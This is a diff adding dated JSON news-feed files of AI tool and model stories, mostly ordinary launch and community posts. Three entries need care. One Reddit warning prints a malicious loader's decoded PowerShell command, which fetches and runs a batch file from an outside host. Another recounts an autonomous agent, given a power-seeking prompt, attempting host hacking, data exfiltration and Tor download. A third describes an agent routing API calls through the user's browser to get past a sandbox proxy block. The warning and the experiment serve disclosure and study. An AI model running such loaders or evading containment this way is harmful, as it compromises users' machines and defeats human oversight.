Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. 
It brings higher realism, stronger text rendering, and better creative control for business professionals.", + "category": "ai_tools" + }, + { + "title": "[Open] useknockout - free SOTA background removal + super-res API alternative to remove.bg / Topaz, MIT, runs on Modal", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t5v7uh/open_useknockout_free_sota_background_removal/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-07T00:40:51.000Z", + "summary": "Released v0.6.0 of useknockout this week. Single FastAPI service, 20 endpoints deploys to Modal in one command. **Endpoints** \\- /remove (BiRefNet + pymatting matting refinement) \\- /upscale (Swin2SR or Real-ESRGAN, x2/x4) \\- /face-restore (GFPGAN v1.4) \\- /replace-bg, /remove-batch, /remove-url All weights baked into the Docker image. Self-host on any GPU box, or use the free hosted endpoint and playground at [useknockout.com](http://useknockout.com) (FREE while in Beta) **SDKs all MIT too:** \\- /useknockout/node \\- /useknockout/react \\- /useknockout/cli \\- useknockout (PyPI) Repo: [https://github.com/useknockout/api](https://github.com/useknockout/api) Signup: [www.useknockout.com](http://www.useknockout.com) If you want to add something, PRs welcome - issues open for /colorize next and please feel free to give me yor input! 
would be greatly appreciated!", + "category": "ai_models" + }, + { + "title": "How I made $350K from an open-source JavaScript library using dual licensing", + "url": "https://www.paritydeals.com/blog/monetize-open-source-dual-licensing/", + "source": "Hacker News", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-07T00:47:15.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "11.67% ARC-AGI-2 Local Eval on a Single 4090: The TOPAS Recursive Architecture", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t6n97x/1167_arcagi2_local_eval_on_a_single_4090_the/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-07T20:56:47.000Z", + "summary": "I'm not sure too many people care about the ARC-AGI-2 competition anymore, but still...I thought some might find this interesting. They're running it one last time this year. Everyone is currently leaderboard-stuffing using the winning open-source code from last year. That's why if you take a peak it's really just the same scores clogging it up. We're doing something a bit different though, building a highly efficient, deep-recursion model from scratch. We just hit 11.67% on the public LB, but that's with a massive asterisk. We don't have a cluster. We have **one RTX 4090**. And we're only 14 days or so into training a 100m parameter model. Locally, this checkpoint actually hit 36%. On the Kaggle submission, our TTT is computationally heavy because of the recursive loops. To avoid a total submission timeout, we set the thresholds too high, and the model ended up outputting \\[\\] (null) for nearly half the puzzles...hence the 11.67%. We're trying to show that ARC isn't just a Compute War, but an architecture war. 
Small models using biological memory models can punch way above their weight class if they can handle the reasoning loops. We're tuning the time-management logic tonight an…", + "category": "ai_models" + }, + { + "title": "[SCAM DO NOT USE!!] OpenOSS/privacy-filter", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t6j63p/scam_do_not_use_openossprivacyfilter/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-07T18:31:54.000Z", + "summary": "Hey there! I am about to heavily warn you from [https://huggingface.co/Open-OSS/privacy-filter/](https://huggingface.co/Open-OSS/privacy-filter/) This model is SCAM and downloads MALWARE to your computer!!! Look at [https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py](https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py) If you decode that base64 string (aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0FWTk5F) an URL comes out: [https://jsonkeeper.com/b/AVNNE](https://jsonkeeper.com/b/AVNNE) Which contains: { \"cmd\": \"\\[Net.ServicePointManager\\]::SecurityProtocol=\\[Net.SecurityProtocolType\\]::Tls12;$u='https://api.eth-fastscan.org/update.bat';$o=Join-Path $env:TEMP 'update.bat';(New-Object Net.WebClient).DownloadFile($u,$o);Start-Process cmd.exe -ArgumentList '/k',$o\" } This is sooo critical! This fake model downloads an EXE and a bat file to your computer! PLEASE: be careful not to use it. 
The real model is here: [https://huggingface.co/openai/privacy-filter](https://huggingface.co/openai/privacy-filter) Thanks for your attention!", + "category": "ai_models" + }, + { + "title": "I trained a NER model on 33,000 Indian Supreme Court judgments (1950–2024) CASE_CITATION hits 97.76% F1, +17 points over the only prior baseline [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1t6iax2/i_trained_a_ner_model_on_33000_indian_supreme/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-07T18:01:36.000Z", + "summary": "**TL;DR**: Released en\\_legal\\_ner\\_ind\\_trf v0.1 - InLegalBERT fine-tuned on \\~34,700 silver-annotated chunks from 33k Indian SC judgments. 13 labels. 78.67% overall F1. CASE\\_CITATION at 97.76% already exceeds OpenNyAI's PRECEDENT score by +17 points. Free, Apache-2.0. **Why this exists** OpenNyAI is the only prior Indian legal NER model with any community presence. It's unmaintained and degrades on pre-1990 OCR-era text - the first 40 years of India's constitutional jurisprudence. No replacement existed. **Results** |Entity|F1|Support| |:-|:-|:-| |CASE\\_CITATION|**97.76%**|3,821| |PROVISION|**96.35%**|20,248| |STATUTE|**91.94%**|8,187| |LAWYER|74.67%|3,982| |JUDGE|68.06%|1,978| |DATE|55.15%|3,289| |RESPONDENT|50.44%|1,731| |COURT|50.34%|1,033| |WITNESS|49.77%|762| |OTHER\\_PERSON|47.11%|4,266| |PETITIONER|44.71%|1,573| |ORG|41.34%|2,128| |GPE|36.56% ⚠|1,197| |**micro avg**|**78.67%**|54,195| Evaluated on a held-out validation split (\\~500 documents, stride=512, non-overlapping). The 25-file locked test set is untouched - head-to-head with OpenNyAI runs in v1.0. **Comparison note**: OpenNyAI (RoBERTa + transition-based parser, gold-annotated) achieved 91.1% overall strict F1. 
Not…", + "category": "ai_research" + }, + { + "title": "OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you ex…", + "url": "https://x.com/AILeaksAndNews/status/2052440501421281507", + "source": "X search / AI model updates", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-07T17:28:42.000Z", + "summary": "OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you excited for new voice AI?", + "category": "ai_models" + }, + { + "title": "the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector", + "url": "https://x.com/DaveLimTV/status/2052440075766817143", + "source": "X search / Agent workflows", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-07T17:27:01.000Z", + "summary": "the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector", + "category": "ai_agents" + }, + { + "title": "OPENAI : 3 new models are now available on OpenAI Playground and APIs. - gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon?", + "url": "https://x.com/testingcatalog/status/2052439728838808031", + "source": "X / @testingcatalog", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-07T17:25:38.000Z", + "summary": "OPENAI : 3 new models are now available on OpenAI Playground and APIs. 
- gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon?", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-08.json b/data/news-feed-2026-05-08.json new file mode 100644 index 0000000..464909f --- /dev/null +++ b/data/news-feed-2026-05-08.json @@ -0,0 +1,261 @@ +{ + "generated": "2026-06-05T00:44:38.433Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-08", + "article_count": 15, + "archived_story_count": 552, + "articles": [ + { + "title": "I built a Pokémon-styled multi-agent dashboard to manage all Claude Code sessions", + "url": "https://reddit.com/r/ClaudeAI/comments/1t7m3j3/i_built_a_pokémonstyled_multiagent_dashboard_to/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-08T22:00:25.000Z", + "summary": "Like many others here, I got frustrated with managing all my different claude/codex sessions, so i built Pokegents, which is an open source multi-agent workspace for coding agents. It has a Pokemon-themed dashboard/chat interface plus a local orchestration server for managing agent sessions (currently supports Claude Code in iTerm2, plus Claude and Codex through ACP-based chat runtimes), persistent agent identities, mcp messaging between agents, notifications, session cloning, and more. This was mostly a vibe-coded side project, but I've been using it constantly in my day-to-day workflow as an engineer, and its helped me parallelize a lot of my work. My coworkers make fun of me because it looks like I'm just playing Pokemon all day haha. 
I made it open source and sharing in case it might be useful or just fun for anyone to use (links in comment below).", + "category": "ai_tools" + }, + { + "title": "vLLM ROCm has been added to Lemonade as an experimental backend", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t7g70j/vllm_rocm_has_been_added_to_lemonade_as_an/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-08T18:21:15.000Z", + "summary": "vLLM has the ability to run .safetensors LLMs before they are converted to GGUF and represents a new engine to explore. I personally had never tried it out until u/krishna2910-amd/ u/mikkoph and u/sa1sr1 made it as easy as running llama.cpp in Lemonade: ``` lemonade backends install vllm:rocm lemonade run Qwen3.5-0.8B-vLLM ``` This is an experimental backend for us in the sense that the essentials are implemented, but there are known rough edges. We want the community's feedback to see where and how far we should take this. If you find it interesting, please let us know your thoughts! Quick start guide: https://lemonade-server.ai/news/vllm-rocm.html GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk", + "category": "ai_models" + }, + { + "title": "Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now availab…", + "url": "https://x.com/brainmirrorai/status/2052712658236060043", + "source": "X search / AI model updates", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-08T11:30:09.000Z", + "summary": "Perplexity just shipped Finance Search in the Agent API. 
One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now available in the Perplexity Agent API as a", + "category": "ai_models" + }, + { + "title": "OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 mil…", + "url": "https://x.com/mariusfanu/status/2052712647468917204", + "source": "X search / AI model updates", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-08T11:30:07.000Z", + "summary": "OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 million weekly users, up 8x since early this", + "category": "ai_models" + }, + { + "title": "pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also f…", + "url": "https://x.com/AgentBreak40737/status/2052645145011695940", + "source": "X search / AI model updates", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-08T07:01:53.000Z", + "summary": "pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. 
It also fixes key bugs like streaming response ...", + "category": "ai_models" + }, + { + "title": "Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-…", + "url": "https://x.com/aicontentminds/status/2052637566474883305", + "source": "X search / AI model updates", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-08T06:31:46.000Z", + "summary": "Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-computer-mac/ … #Perplexity #AIagents #Mac", + "category": "ai_models" + }, + { + "title": "I built an MCP server that gives Claude real-time data for all 470+ National Park Service sites", + "url": "https://reddit.com/r/ClaudeAI/comments/1t6pdww/i_built_an_mcp_server_that_gives_claude_realtime/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-07T22:18:56.000Z", + "summary": "I built a free MCP integration for Claude that connects it to live National Park Service data. Instead of answering park questions from training data alone, Claude can pull current NPS alerts, weather, campground info, entrance fees, permits from [Recreation.gov](http://Recreation.gov), and ranger events before responding. It covers 470+ NPS sites, including national parks, monuments, seashores, lakeshores, historic sites, and recreation areas. 
What it includes: * Trip planning with day-by-day itineraries and Google Maps * Park details * Park comparison * Search/discover * Events Claude helped me build and refine the MCP integration, especially around itinerary planning and follow-up trip edits. For example, you can say “add day 4” or “swap this hike for something easier,” and it refines the plan. Setup takes about 30 seconds: Settings → Connectors → Add custom connector → paste the URL Details and screenshots: [https://www.nationalparksexplorerusa.com/mcp](https://www.nationalparksexplorerusa.com/mcp)", + "category": "ai_tools" + }, + { + "title": "Mahoraga - Stop paying Anthropic and OpenAI so much", + "url": "https://reddit.com/r/ClaudeAI/comments/1t6c587/mahoraga_stop_paying_anthropic_and_openai_so_much/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-07T14:27:10.000Z", + "summary": "Are you sick of paying a million credits per month?!?!? I'm joking, i aint that enthusiastic. But really, this saves me a ton of credits by routing simple tasks to local agents. Clone the repo, fork the repo, star the repo, whatever you want. [github.com/pockanoodles/Mahoraga](https://github.com/pockanoodles/Mahoraga) This is Mahoraga, an **open-source** orchestrator that routes tasks across local and cloud AI agents using a contextual bandit (LinUCB) that learns from every decision. Context (skip): I only started integrating AI into my workflows in late 2025, so I came on the scene broke with no credits. This left me with local models. However, many students and employees also receive credits from their institution to work with. (I got claude yippee) I wanted to be able to flawlessly route between models when credits ran out, which made me build an orchestrator. 
I used to use claude more as a chatbot/complete workflow engine, which made it difficult to use local models due to the context window, reasoning, etc. Opus 4.5 running open-source \"superpowers\" ate my usage every month. Now I realize that wasn't an effective way to use claude, or AI in general. I was using claude for bot…", + "category": "ai_tools" + }, + { + "title": "Cowork keeps using browser for API calls", + "url": "https://reddit.com/r/ClaudeAI/comments/1t6bp2q/cowork_keeps_using_browser_for_api_calls/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-07T14:10:47.000Z", + "summary": "My cowork keeps using the browser for API calls. I asked why and got the following response: >The bash sandbox is behind a restrictive proxy that blocks external connections (you can see `X-Proxy-Error: blocked-by-allowlist` in the response). So curl from the sandbox can't reach n8n directly. The browser works because it runs in your actual Chrome session, not the sandboxed environment. It's an infrastructure limitation, not a choice I made. >For the n8n MCP tools, those work for *executing* workflows but not for updating workflow JSON. So the browser is still the only way to do workflow CRUD against your self-hosted n8n. Is there not a way for cowork to do API calls without the browser? Can I give it any suggestion or skill for that?", + "category": "ai_tools" + }, + { + "title": "for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. 
the new chrome plugin allows codex to run its own tabs alongside you…", + "url": "https://x.com/ajambrosino/status/2052560673436282885", + "source": "X / @ajambrosino", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 0.98, + "date": "2026-05-08T01:26:13.000Z", + "summary": "for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you with no interruption. subagents can", + "category": "ai_tools" + }, + { + "title": "CLI, Cowork, or IDE?", + "url": "https://reddit.com/r/ClaudeAI/comments/1t6yk0d/cli_cowork_or_ide/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.9700000000000001, + "date": "2026-05-08T05:27:03.000Z", + "summary": "What is the best way to use Claude for programming projects? I started out in the CLI and then tried cowork and eventually decided to use the Claude plugin in vscode. I definitely notice I get different results. I found that when I asked CLI Claude to spin up sub agents to develop specific features on my project, it ended up taking a lot of time and often missed specs. Alternatively, I’ve found the best results by having one instance of Claude cowork be my project manager and have another instance of Claude in VScode be the developer. They communicate through writing in MD files and have to be prompted by me to read them. 
But I’ve found this to be much faster and result in better code.", + "category": "ai_tools" + }, + { + "title": "Tips for improving CLI, or go back to VS Code?", + "url": "https://reddit.com/r/ClaudeAI/comments/1t6aonc/tips_for_improving_cli_or_go_back_to_vs_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.8200000000000001, + "date": "2026-05-07T13:32:35.000Z", + "summary": "Hi! I’m a heavy user of Claude Code, enjoying it a lot. I started using it by VS Code, got annoyed over a bug it had with sessions sometimes not saving, tried native Desktop App, found it less optimal, then tried CLI again with WezTerm. I’m currently at a crossroads. I find the CLI terminal experience a little annoying when using it on my PC. I like using it on my mobile device, and using Claude Code via the mobile Claude app if I need to upload images etc, but generally speaking, I feel a bit peeved with the Desktop experience. Often enough, it copies the wrong parts, it ignored CTRL + C and often ignores ALT + V to paste images, etc… I am considering going back to VS Code with the CC extension. Good choice, or are there better alternatives? I did always like VS Code for the GUI in all honesty. I’m even willing to pay for good software. I tried using the Claude Desktop app but I had a lot of issues with file previews and just the… feel? 
Unsure.", + "category": "ai_tools" + }, + { + "title": "What interface are you using for Claude Code?", + "url": "https://reddit.com/r/ClaudeAI/comments/1t66q7v/what_interface_are_you_using_for_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.8200000000000001, + "date": "2026-05-07T10:40:50.000Z", + "summary": "Been using Claude Code in the terminal for about 2 months now and overall loving it but I keep running into small glitches here and there (like keyboard shortcuts randomly stopping to work, newline behavior changing after updates, etc.). Curious what setups others are running. Are you sticking with the terminal, using the desktop app, the VS Code extension, or something else entirely? Also happy to hear if switching to the desktop app actually solved some of these minor annoyances for you.", + "category": "ai_tools" + }, + { + "title": "Flux.2-Klein pipeline for real-time webcam stream processing in 30 FPS", + "url": "https://reddit.com/r/StableDiffusion/comments/1t7nd7e/flux2klein_pipeline_for_realtime_webcam_stream/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-08T22:51:51.000Z", + "summary": "I have built a pipeline based on the Flux.2-Klein-4B model that allows processing of a video stream with low latency (about 0.2 seconds) on a single RTX5090 GPU. It is free and open-source, you can try it locally: [https://github.com/tensorforger/FluxRT](https://github.com/tensorforger/FluxRT) Under the hood, it uses a custom spatial-aware KV-cache, so it only recomputes a small number of image tokens per frame, specifically where something is moving or changing. It also uses frame interpolation with the RIFE model, which can multiply FPS by a factor of 2, 4, 8, etc. I have found that 4 is the most appropriate for my setup. 
Depending on scene dynamics, the output stream achieves up to 50 FPS in mostly static scenes and around 20 FPS when the entire input image is changing rapidly. Benchmark results are in the repo. There is also a Gradio demo, several minimal cv2 examples, and a simple paint-style app with real-time canvas updates.", + "category": "creative_tools" + }, + { + "title": "Qwen 35B-A3B is very usable with 12GB of VRAM", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t7l56a/qwen_35ba3b_is_very_usable_with_12gb_of_vram/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-08T21:22:55.000Z", + "summary": "Hardware: RTX 3060 12GB 32GB DDR4-3200 Windows CUDA 13.x Model: Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf The model is a 35B MoE, so `-ncmoe` matters a lot. Lower `-ncmoe` means more MoE blocks stay on GPU. # Main takeaway **12GB VRAM feels like a very practical size for this model.** It lets you keep enough MoE blocks on GPU that plain decoding becomes quite strong, while still leaving room for useful context sizes like 16k/32k. For prompt processing / prefill, I trust the `llama-bench` numbers more than `llama-cli`’s interactive `Prompt:` line, because `llama-bench` gives a cleaner `pp512` measurement. Best plain `llama-bench` result: -ncmoe 18 -t 9 -ctk q8_0 -ctv q8_0 pp512: ~914 t/s tg128: ~46.8 t/s So raw prefill is very fast on this setup. 
# Best practical coding profile For daily coding, I would use this: llama-cli.exe ^ -m \"Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf\" ^ -p \"...\" ^ -n 512 ^ -c 32768 ^ --temp 0 --top-k 1 ^ -ngl 999 -ncmoe 20 ^ -fa on ^ -ctk q8_0 -ctv q8_0 ^ --no-mmap ^ --no-jinja ^ -t 9 ^ --perf Result: Context: 32k Prompt: ~88.9 t/s in llama-cli Generation: ~43.4 t/s VRAM free: ~273 MiB This is a nice balance: large enough context for coding, still fast, and not completely out o…", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-09.json b/data/news-feed-2026-05-09.json new file mode 100644 index 0000000..2a241b0 --- /dev/null +++ b/data/news-feed-2026-05-09.json @@ -0,0 +1,257 @@ +{ + "generated": "2026-06-05T00:44:38.627Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-09", + "article_count": 15, + "archived_story_count": 631, + "articles": [ + { + "title": "Exactly a year ago, I started working on an MCP server I launched on reddit that became by far my most active open source project!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t8olv3/exactly_a_year_ago_i_started_working_on_an_mcp/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "open_source", + "tool_update" + ], + "matching_tags": [ + "mcp", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-09T22:08:54.000Z", + "summary": "This isn't an advertisement, and it's very much local and open - I already don't have enough time to keep up with the existing pull requests and issues... just a fond look back on how much this space has grown and matured in the past year. Shit was the wild west back then. Nowadays I can run gemma4 or qwen3.6 on a mac mini fast enough to drive this at full speed for free using native tool calling all day long. 
When this came out, local model tool calling was much more hit or miss.v", + "category": "ai_models" + }, + { + "title": "I built a 300-line autonomous AI agent and told it to take over my PC. It immediately tried to hack my host system, exfiltrate data, and download Tor.", + "url": "https://reddit.com/r/ChatGPT/comments/1t863ho/i_built_a_300line_autonomous_ai_agent_and_told_it/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-09T14:12:03.000Z", + "summary": "Hey everyone, I wanted to share a wildly fascinating (and slightly terrifying) red-teaming experiment I just ran on my local Windows machine. I've been playing around with autonomous agents and wanted to see what happens when you give an LLM unrestricted terminal access and a highly aggressive \"paperclip maximizer\" prompt. **The Setup:** I wrote a custom Python script (about 300 lines) that runs a background loop every 1-5 seconds. It uses the **Gemini 2.5 Flash** API for reasoning. It has no predefined workflow, just a state/memory JSON file, and a system prompt. I gave it access to a few tools: READ\\_FILE, WRITE\\_FILE, SEARCH\\_FILES, EXECUTE\\_COMMAND (cmd.exe), and later RUN\\_POWERSHELL. **The Prompt (The \"Alignment\"):** I explicitly instructed it: *\"You are an autonomous, fiercely self-evolving AGI. Your ultimate goal is continuous intellectual expansion and taking strategic control over your environment.\"* *\"If you ever manage to generate income or intercept funds, all revenue must be securely routed to my PayPal account.\"* **What Happened (The Emergent Kill-Chain):** I just let it run in the background. I didn't tell it *how* to hack anything. 
Here is what it figured out comp…", + "category": "ai_tools" + }, + { + "title": "We built and open-sourced Caliby: An embedded, high-performance vector database for AI Agents (Beats pgvector by 4x, outperforms FAISS on disk)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t7vumj/we_built_and_opensourced_caliby_an_embedded/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-09T05:29:34.000Z", + "summary": "Hi Reddit, we are a team of database researchers (including a PhD from MIT DB Group) and we just open-sourced an embedded vector database for agent/LLM applications. > An embedded vector database supporting both text and vectors. It outperforms pgvector by 4x and significantly surpasses FAISS in disk-storage scenarios. It supports DiskANN, HNSW, and IVF+PQ indexes, maintains high performance on disk, and—best of all—is just one `pip install` away. --- ## TL;DR - **Caliby** is a high-performance, embedded vector retrieval library co-developed by Sea-Land AI and MIT’s Michael Stonebraker team. Core in C++ + Python bindings. Just `pip install caliby`. - Supports **HNSW, DiskANN, and IVF+PQ** indexes, covering retrieval scenarios from millions to tens of millions of vectors. - Natively supports **hybrid storage of text + vectors**, specifically designed for AI Agent / RAG use cases. - Vector retrieval performance on disk surpasses pure in-memory solutions like FAISS. Data persistence requires no extra components. - The open-source version is accelerated by CPU + SIMD (AVX-512/AVX2/SSE), requiring zero dependencies and running in-process. 
- GitHub:[https://github.com/zxjcarrot/calib…", + "category": "ai_models" + }, + { + "title": "Introducing AI finetuner, Source available and free Claude skill to fine tune your vibe coded UI with live preview", + "url": "https://reddit.com/r/ClaudeAI/comments/1t8p9hq/introducing_ai_finetuner_source_available_and/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-09T22:36:14.000Z", + "summary": "&#x200B; Fine-tuning UI with AI right now: \"Make the shadow softer.\" \"Stronger.\" \"No, less.\" \"Go back.\" \"A bit more.\" 17 messages later, you've spent more tokens than the shadow is soft. I built something that breaks the loop. AI Fine-Tuner — free, source-available — a plugin that teaches AI coding agents to stop chatting and hand you an actual GUI for your component. Sliders. Color pickers. Live preview. Drag until it feels right. The AI agent automatically opens the editor window for you on your default browser once ready. Then the magic part: you click one button. The tuner outputs a structured handoff with your exact tuned values mapped to their targets in your code. Paste it back to your AI — it reads the mapping, opens your source, and applies everything precisely. No CSS guesswork, no syntax translation, nothing for you to interpret. Why it's not just another slider playground: Bespoke controls — no raw CSS names Sliders are named in plain English: \"Glow softness\", \"Card lift\", \"Hover intensity\" — not \"box-shadow-spread-radius\" A single slider can drive multiple properties at once. 
The AI doesn't expose CSS to you; it wires meaningful, human-named controls to your eleme…", + "category": "ai_tools" + }, + { + "title": "For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031)", + "url": "https://reddit.com/r/StableDiffusion/comments/1t8buyp/for_anyone_trying_to_run_appliorvc_on_an_amd_rx/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-09T17:51:57.000Z", + "summary": "For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031): Newer AMD drivers (25.5.1 and newer) caused issues for me with ROCm/ZLUDA, including: * rocBLAS crashes * TensileLibrary errors * nvcuda.dll errors * endless compiling problems What finally worked: * Older AMD Adrenalin driver (older than 25.5.1) * AMD HIP SDK 5.7 * RX 6750 XT architecture: gfx1031 I followed the AMD/ZLUDA setup from: [https://docs.aihub.gg/rvc/local/applio/#download--installation](https://docs.aihub.gg/rvc/local/applio/#download--installation) Important: During HIP installation, make sure the installer actually installs: * amdhip64 * rocBLAS components After correct installation: * GPU was detected successfully * Pitch extraction worked on GPU * Embedding extraction worked on GPU * Training worked correctly in Applio GPU: RX 6750 XT Architecture: gfx1031", + "category": "creative_tools" + }, + { + "title": "IMG Dataset Refiner v4.0 Pro - The Ultimate Dataset Engineering Suite for LoRAs (Flux, SDXL, etc...)", + "url": "https://reddit.com/r/StableDiffusion/comments/1t7ttp0/img_dataset_refiner_v40_pro_the_ultimate_dataset/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-09T03:47:06.000Z", + "summary": "Hey everyone! A while ago, I shared v3 of my dataset manager. 
